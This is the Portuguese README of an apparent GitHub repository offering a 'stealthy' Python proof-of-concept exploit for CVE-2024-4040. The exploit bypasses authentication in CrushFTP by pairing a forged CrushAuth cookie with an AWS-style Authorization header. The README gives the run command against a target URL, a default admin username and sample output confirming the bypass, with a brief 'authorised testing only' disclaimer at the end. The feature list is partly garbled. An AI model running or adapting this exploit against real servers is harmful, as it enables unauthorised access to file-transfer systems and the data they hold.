
Exploit para CVE-2024-4040 – Bypass de autenticação no CrushFTP via cookie CrushAuth e falsificação de cabeçalho no estilo AWS. PoC em Python discreto, com geração segura de token, bypass de SSL e saída aprimorada.
Este repositório contém um exploit furtivo de prova de conceito (PoC) em Python para CVE-2024-4040, uma vulnerabilidade crítica no CrushFTP (v10 e anteriores) que permite a um atacante contornar a autenticação usando um cookie CrushAuth forjado e um cabeçalho Authorization no estilo AWS.
Um atacante não autenticado pode contornar a autenticação em instâncias CrushFTP vulneráveis ao criar uma combinação específica de cookie/cabeçalho, obtendo acesso não autorizado a funções web internas.
CrushAuth usando secretsAuthorization forjado válido no estilo AWSrequests)python3 CVE-2024-4040.py http://target-ip:8080 --valid_username crushadmin
target_url — URL base do servidor CrushFTP
--valid_username — Usuário válido conhecido (padrão: crushadmin)
🔍 Exemplo de Saída
[*] CrushFTP Authentication Bypass Exploit
[*] Targeting: http://192.168.1.10:8080
[*] Using username: crushadmin
[+] Exploit Result:
Status_Code : 200
Response_Text : {"getUserNameResponse":{"user_name":"crushadmin"}}
[+] CrushFTP Server is VULNERABLE!
Este código é apenas para fins educacionais e de testes de segurança autorizados. Não o utilize contra sistemas que você não possua ou para os quais não tenha permissão explícita para testar.
PoC Refactor: illdeed